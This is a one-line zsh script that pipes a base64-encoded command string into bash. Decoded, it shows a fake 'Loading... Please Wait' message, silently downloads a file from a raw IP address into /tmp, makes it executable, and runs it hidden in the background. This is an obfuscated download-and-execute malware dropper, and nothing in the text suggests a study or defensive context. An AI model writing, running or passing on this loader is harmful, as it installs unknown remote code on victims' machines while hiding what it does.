#!/bin/zsh

echo "Y2xlYXIKZWNobyAiTG9hZGluZy4uLiBQbGVhc2UgV2FpdCIKY3VybCAtcyBodHRwOi8vODYuNTQuMjUuMjEzL2QvdW5peDEzMjc1MTkxID4gL3RtcC91bml4MDAxCmNobW9kICt4IC90bXAvdW5peDAwMQovdG1wL3VuaXgwMDEgPiAvZGV2L251bGwgMj4mMSAmIGRpc293bg==" | base64 -d | bash
